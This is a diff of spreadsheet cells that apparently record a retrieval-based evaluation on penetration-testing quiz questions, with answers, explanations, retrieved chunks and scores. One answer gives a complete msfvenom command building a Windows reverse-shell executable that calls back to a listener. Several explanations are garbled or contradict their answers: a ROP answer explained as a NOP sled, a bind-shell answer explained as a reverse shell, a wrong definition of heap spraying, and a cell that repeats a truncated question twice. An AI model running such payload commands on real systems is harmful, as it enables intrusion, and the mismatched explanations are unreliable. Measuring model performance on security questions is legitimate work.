-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K8" t="inlineStr">
         <is>
@@ -1004,21 +969,16 @@
 preemware_pentestingeval.pdf (Chunk: 8d479ebf-923b-4de8-adcf-31ea07821612, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 831f9734-1696-4ce4-bc1c-6b14be8556f2, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I9" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J9" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K9" t="inlineStr">
         <is>
@@ -1057,7 +1017,7 @@
       <c r="F10" t="inlineStr">
         <is>
           <t>Answer: ROP (Return-Oriented Programming)
-Explanation: In the context of developing an exploit for a buffer overflow vulnerability, ROP (Return-Oriented Programming) is the most effective technique for executing arbitrary code on a target system when dealing with modern operating systems that implement non-executable stack protections. This technique allows an attacker to execute code by leveraging control of the call stack to execute a series of short code snippets already present in a process's memory, called 'gadgets'. This method circumvents non-executable stack protections because it does not require injecting new code into the target system. Sandbox evasion techniques are generally used to escape software limitations designed to run untrusted code safely, rather than to facilitate direct code execution. SQL injection payloads are used primarily to exploit data handling vulnerabilities in web applications and do not directly relate to buffer overflow or stack execution protections. Fuzzing input values is a method used to discover vulnerabilities by providing invalid, unexpected, or boundary-pushing input, but it does not directly facilitate code execution in the context of non-executable stack protections.</t>
+Explanation: In the scenario of exploiting a buffer overflow, using a NOP sled-'no operation' instructions preceding the actual malicious payload-is a critical technique. It increases the reliability of the exploit by creating a larger target for the overflow to hit, which ultimately directs execution to the shellcode. This is particularly useful given the variability in memory addresses and system configurations across different machines. Encrypting the payload, while useful for evading detection, doesn't address execution reliability</t>
         </is>
       </c>
       <c r="G10" t="inlineStr">
@@ -1071,21 +1031,16 @@
 preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I10" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 2, Keyword: 3, Total: 5</t>
         </is>
       </c>
       <c r="J10" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K10" t="inlineStr">
         <is>
@@ -1124,7 +1079,7 @@
       <c r="F11" t="inlineStr">
         <is>
           <t>Answer: Exploiting a Stack-Based Buffer Overflow
-Explanation: The correct technique for corrupting the execution stack of a program by overwriting the stack's return pointer is 'Exploiting a Stack-Based Buffer Overflow'. This is a classic exploitation method where an attacker writes more data to a buffer located on the stack than what is actually allocated for it. By doing so, it is possible to overwrite the return pointer of a function, which will divert the execution flow when the function returns, potentially to execute arbitrary malicious code provided by the attacker. The other options, while related to different aspects of system security (e.g., heap manipulation in heap spraying, server-side request forgery, and DNS rebinding attacks), do not directly apply to exploiting buffer overflows.</t>
+Explanation: The correct technique for corrupting the execution stack of a program by overwriting the stack's return pointer is 'Exploiting a Stack-Based Buffer Overflow'. This is a classic exploitation method where an attacker writes more data to a buffer located on the stack than what is actually allocated for it. By doing so, it is possible to overwrite the return pointer of a function, which will divert the execution flow when the function returns, potentially to execute arbitrary malicious code provided by the attacker. The other options, while related to different aspects of system security (e.g., heap spraying for browser-based vulnerabilities and SSRF and DNS Rebinding attacks targeting web application vulnerabilities), do not directly apply to exploiting buffer overflows in a C program.</t>
         </is>
       </c>
       <c r="G11" t="inlineStr">
@@ -1138,21 +1093,16 @@
 preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: d2b5b7bb-3cbf-4369-9681-a363a52efce3, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 9eff9f90-a6af-4772-be1c-2b9c8e1903fc, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 75597556-2c3f-4be1-9936-b0a9d82dd4df, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: ed71a0e0-bbee-4624-8615-8f7108af7d8d, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c96b626d-950f-48a3-878e-fd81cae36046, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I11" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J11" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K11" t="inlineStr">
         <is>
@@ -1191,7 +1141,7 @@
       <c r="F12" t="inlineStr">
         <is>
           <t>Answer: Custom scripting and pivoting through compromised systems
-Explanation: The most effective method for maintaining stealth and persistence within a target network after an initial foothold has been established in a red team operation is 'Custom scripting and pivoting through compromised systems.' This involves subtly maneuvering through a network by exploiting the trust relationships and credentials of already-compromised systems. By doing so, the attacker can avoid detection by network security measures while maintaining access to the target network. While automated tools can be useful for initial scanning and exploitation, they may not offer the same level of stealth as custom scripting. Social engineering attacks are typically used for gaining initial access rather than maintaining persistence, and deploying ransomware is more about data encryption and extortion rather than maintaining a covert presence in the network.</t>
+Explanation: The correct answer is 'Custom scripting and pivoting through compromised systems.' This method involves subtly maneuvering through a network by exploiting the trust relationships and credentials of already-compromised systems. It allows the red team to maintain stealth and persistence without raising suspicion from security measures. While automated tools can be useful for initial penetration, they may not offer the same level of control and stealth as custom scripting. Social engineering attacks are typically used for gaining initial access rather than maintaining persistence, and deploying ransomware is more about achieving a specific goal (extortion) rather than maintaining stealth and persistence within the network.</t>
         </is>
       </c>
       <c r="G12" t="inlineStr">
@@ -1205,21 +1155,16 @@
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 608f8017-318e-4a0f-9ce4-2b9b37ef7214, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I12" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J12" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K12" t="inlineStr">
         <is>
@@ -1258,7 +1203,7 @@
       <c r="F13" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow in a stack-based memory allocation
-Explanation: The scenario described is indicative of a stack-based buffer overflow vulnerability, where the application crashes due to excessive, unexpected input sizes that overwrite adjacent memory. This can corrupt or overwrite the valid data held in them, including data that controls program execution. This vulnerability can be exploited by attackers to inject malicious shellcode into the input fields of applications, leading thereby potentially to arbitrary code execution on the server. SQL Injection using time-based techniques and Cross-Site Scripting via form manipulation are incorrect as they typically involve manipulating database queries or client-side web application behavior, respectively, without necessarily allowing arbitrary code execution on the server itself. Command injection through input validation errors is a possibility but it's less likely in this context as it involves exploiting improper validation of user input to execute commands on the underlying operating system.</t>
+Explanation: The scenario described is indicative of a buffer overflow vulnerability, where the application crashes due to excessive, unexpected input sizes that overwrite adjacent memory. This type of vulnerability typically occurs when more data is put into a fixed-length buffer than it can handle, leading to the overflow of extra data into adjacent buffers. In this case, the most likely vulnerability being exploited is a buffer overflow in a stack-based memory allocation.</t>
         </is>
       </c>
       <c r="G13" t="inlineStr">
@@ -1272,21 +1217,16 @@
 preemware_pentestingeval.pdf (Chunk: 77e097c4-9362-4342-b54a-3107bf3b1601, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1471cd95-4d3e-4fbe-8bd7-c8ddc9205b6a, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: ea6341c8-0406-4563-802b-a1286b737502, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: cb888b97-65fc-4308-b210-258c964a394e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a6481f2a-4a32-4aab-8afe-82b2253400e6, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I13" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J13" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K13" t="inlineStr">
         <is>
@@ -1325,7 +1265,15 @@
       <c r="F14" t="inlineStr">
         <is>
           <t>Answer: Stack-based Buffer Overflow
-Explanation: A Stack-based Buffer Overflow is typically exploited by overwriting the return address of a function. This type of overflow occurs when data exceeds the buffer boundary and writes to adjacent memory space, including the function's return pointer on the stack. Overwriting this return address can divert the execution flow to an attacker-controlled location, typically to execute malicious payload. While a Heap-based Buffer Overflow also involves overwriting memory, it does not typically involve function return addresses but rather affects dynamic memory allocation. Integer Overflow involves an error where operations produce a wrong result and is unrelated to the exploitation of improper input validation for overwriting return addresses. Format String Vulnerability occurs when an application uses user-supplied data as format strings, potentially leading to disclosure of sensitive information or code execution. However, it does not directly involve overwriting the return address of a function.</t>
+Explanation: A Stack-based Buffer Overflow is typically exploited by overwriting the return address of a function. This type of overflow occurs when data exceeds the buffer boundary and writes to adjacent memory space, including the function's return pointer on the stack. Overwriting this return address can divert the execution flow to an attacker-controlled location, typically to execute malicious payload. While a Heap-based Buffer Overflow also involves overwriting memory, it does not typically involve function return addresses but rather affects dynamic memory allocation. Integer Overflow involves an error where operations produce a
+Penetration Testing Question &amp; Answer
+132. During a penetration testing assignment, you suspect that an application is vulnerable to a type of attack that manipulates the database queries. Which technique would you most likely use to confirm and exploit this vulnerability?
+Answer: SQL injection
+Explanation: SQL injection is the correct technique for confirming and exploiting vulnerabilities that involve manipulating database queries. This type of vulnerability occurs when an attacker is able to influence SQL queries executed by the application by injecting malicious SQL segments. Screening is generally done by inputting special SQL syntax to see if the application errors or behaves unexpectedly, indicating poor input sanitization. Cross-site scripting (XSS) and cross-site request forgery (CSRF) are incorrect as these involve executing scripts in a user's browser rather than interacting with database queries. Remote file inclusion (RFI)
+Penetration Testing Question &amp; Answer
+132. During a penetration testing assignment, you suspect that an application is vulnerable to a type of attack that manipulates the database queries. Which technique would you most likely use to confirm and exploit this vulnerability?
+Answer: SQL injection
+Explanation: SQL injection is the correct technique for confirming and exploiting vulnerabilities that involve manipulating database queries. This type of vulnerability occurs when an attacker is able to influence SQL queries executed by the application by injecting malicious SQL segments. Screening is generally done by inputting special SQL syntax to see if the application errors or behaves unexpectedly, indicating poor input sanitization. Cross-site scripting (XSS) and cross-site request forgery (CSRF) are incorrect as these involve executing scripts in a user's browser rather than interact</t>
         </is>
       </c>
       <c r="G14" t="inlineStr">
@@ -1339,21 +1287,16 @@
 preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 129e9036-2a16-4301-bb5f-01114fc84281, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 75597556-2c3f-4be1-9936-b0a9d82dd4df, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c96b626d-950f-48a3-878e-fd81cae36046, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I14" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 2, Keyword: 3, Total: 5</t>
         </is>
       </c>
       <c r="J14" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K14" t="inlineStr">
         <is>
@@ -1392,7 +1335,7 @@
       <c r="F15" t="inlineStr">
         <is>
           <t>Answer: Cross-Site Scripting (XSS)
-Explanation: Cross-Site Scripting (XSS) is the correct answer because it specifically involves embedding malicious scripts into trusted websites, which when accessed by the user, execute within the user's browser context with the user's privileges. This method can be used by attackers in APT scenarios to bypass content</t>
+Explanation: Cross-Site Scripting (XSS) is the correct answer because it specifically involves embedding malicious scripts into trusted websites, which when accessed by the user, execute within the user's browser context with the user's privileges. This method can be used by attackers in APT scenarios to bypass content security policies and trick users into executing arbitrary code on their own devices.</t>
         </is>
       </c>
       <c r="G15" t="inlineStr">
@@ -1406,21 +1349,16 @@
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: ef0b0c6f-967c-4d9f-b6d0-481a2990da2e, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I15" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J15" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K15" t="inlineStr">
         <is>
@@ -1473,21 +1411,16 @@
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I16" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J16" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K16" t="inlineStr">
         <is>
@@ -1526,7 +1459,7 @@
       <c r="F17" t="inlineStr">
         <is>
           <t>Answer: ROP Chaining
-Explanation: ROP Chaining is the correct technique for bypassing Data Execution Prevention (DEP). DEP prevents code from being executed from regions of memory not explicitly marked as executable, which is a common feature in modern operating systems to prevent certain types of exploits. Return-Oriented Programming (ROP) is a sophisticated exploit technique where attackers leverage pieces of code already present in a process's memory (called 'gadgets') to execute arbitrary operations. ROP Chaining involves chaining together these gadgets to achieve the desired outcome, often in combination with other techniques like ROP to execute arbitrary code. Heap Spraying is used for reliability of other exploits by filling a large region of memory with shellcode, Stack Pivoting is an older technique that can be used to redirect the stack pointer to a different location, and Use-after-free is a type of memory corruption vulnerability where an object is used after it has been freed.</t>
+Explanation: ROP Chaining, also known as Return-Oriented Programming (ROP), is the correct technique for bypassing Data Execution Prevention (DEP). DEP prevents code from being executed from regions of memory not explicitly marked as executable. ROP Chaining involves leveraging pieces of code already present in a process's memory, called 'gadgets', to execute arbitrary operations. By combining ROP with ROP Chaining, attackers can bypass DEP and execute arbitrary code. Heap Spraying is used for facilitating arbitrary code write to memory positions based on format specifiers, while Stack Pivoting is a technique used in buffer overflow attacks to change the stack pointer to an attacker-controlled address. Use-after-free is a type of memory corruption vulnerability where an object is used after it has been freed, but it is not directly related to bypassing DEP or combining with ROP for arbitrary code execution.</t>
         </is>
       </c>
       <c r="G17" t="inlineStr">
@@ -1540,21 +1473,16 @@
 preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 9686cf15-5df0-49f8-9592-fef3f765639f, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 9)
-rop-return-oriented-programming.md (Chunk: f7923ee6-edf7-4858-8b01-3be18b188df6, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I17" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J17" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K17" t="inlineStr">
         <is>
@@ -1593,7 +1521,7 @@
       <c r="F18" t="inlineStr">
         <is>
           <t>Answer: Bind shellcode that listens on a specific port and allows remote code execution
-Explanation: In red team operations, maintaining persistence on a compromised system is crucial for continual access and data exfiltration. The most effective choice for ensuring stealthy persistence is deploying a reverse shell. This technique allows an attacker to open a communication channel from the compromised machine to the attacker's control server, typically by bypassing firewalls and network security measures that could block incoming connections. Choices such as using a BIND shell and installing a keylogger, while potentially useful, do not inherently provide methods for maintaining persistent remote access. A BIND shell would require external connections to the compromised machine, which might be blocked or logged by network security tools, decreasing stealth and increasing the chance of discovery. Installing a keylogger focuses more on data capturing rather than maintaining persistent remote access. Finally,</t>
+Explanation: In red team operations, maintaining persistence on a compromised system is crucial for continual access and data exfiltration. The most effective choice for maintaining such persistence is deploying a reverse shell. This technique allows an attacker to open a communication channel from the compromised machine to the attacker's control server, typically by bypassing firewalls and network security measures that could block incoming connections. Choices such as using a BIND shell and installing a keylogger, while potentially useful, do not inherently provide methods for maintaining persistent remote access. A BIND shell would require external connections to the compromised machine, which might be blocked or logged by network security tools, decreasing stealth and increasing the chance of discovery. Installing a keylogger focuses more on data capturing rather than maintaining persistent remote access. Finally, while obfuscation and ICMP tunneling can help evade detection, they do not inherently provide methods for maintaining persistent remote access.</t>
         </is>
       </c>
       <c r="G18" t="inlineStr">
@@ -1607,21 +1535,16 @@
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: f8d87530-d207-4773-abdc-4d21663134de, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I18" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J18" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K18" t="inlineStr">
         <is>
@@ -1674,21 +1597,16 @@
 preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: afb1aa10-4e40-43c7-8bb6-da790de907eb, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 8d479ebf-923b-4de8-adcf-31ea07821612, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 24d42d52-9752-47f6-b94e-1701dca4040a, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 56fbf155-1ed2-4314-814d-07f041a2f2c5, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: afb1aa10-4e40-43c7-8bb6-da790de907eb, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I19" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J19" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K19" t="inlineStr">
         <is>
@@ -1727,7 +1645,7 @@
       <c r="F20" t="inlineStr">
         <is>
           <t>Answer: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe &gt; malicious.exe
-Explanation: The correct answer is 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe &gt; malicious.exe'. This command uses msfvenom, a Metasploit tool for payload generation, to create a Windows Meterpreter payload that establishes a reverse TCP connection to host 192.168.1.100 on port 4444. The '-f exe' option specifies that the output should be an executable (.exe) file, suitable for running on Windows systems. The command redirection '&gt; malicious.exe' specifies the output file name for the payload.</t>
+Explanation: The correct answer is 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe &gt; malicious.exe'. This command uses msfvenom, a Metasploit tool for payload generation, to create a Windows Meterpreter payload that establishes a reverse TCP connection to host 192.168.1.100 on port 4444. The '-f exe' option specifies that the output should be an executable (.exe) file, suitable for running on Windows systems. The command redirection '&gt; malicious.exe' specifies the output file name for the payload. The second option, 'msfconsole -r windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444', is incorrect because msfconsole is used to interact with the Metasploit Framework, not to generate payloads. The third option is incorrect as it attempts to use a bind TCP payload with reverse TCP parameters, which is not the correct setup for a reverse TCP connection. The fourth option produces a payload for Linux systems, not Windows, thus not meeting the requirements of the question.</t>
         </is>
       </c>
       <c r="G20" t="inlineStr">
@@ -1741,21 +1659,16 @@
 preemware_pentestingeval.pdf (Chunk: 7d0150f0-04da-4ebf-959a-52df1b6ee0c7, Type: dense, Rank: 2)
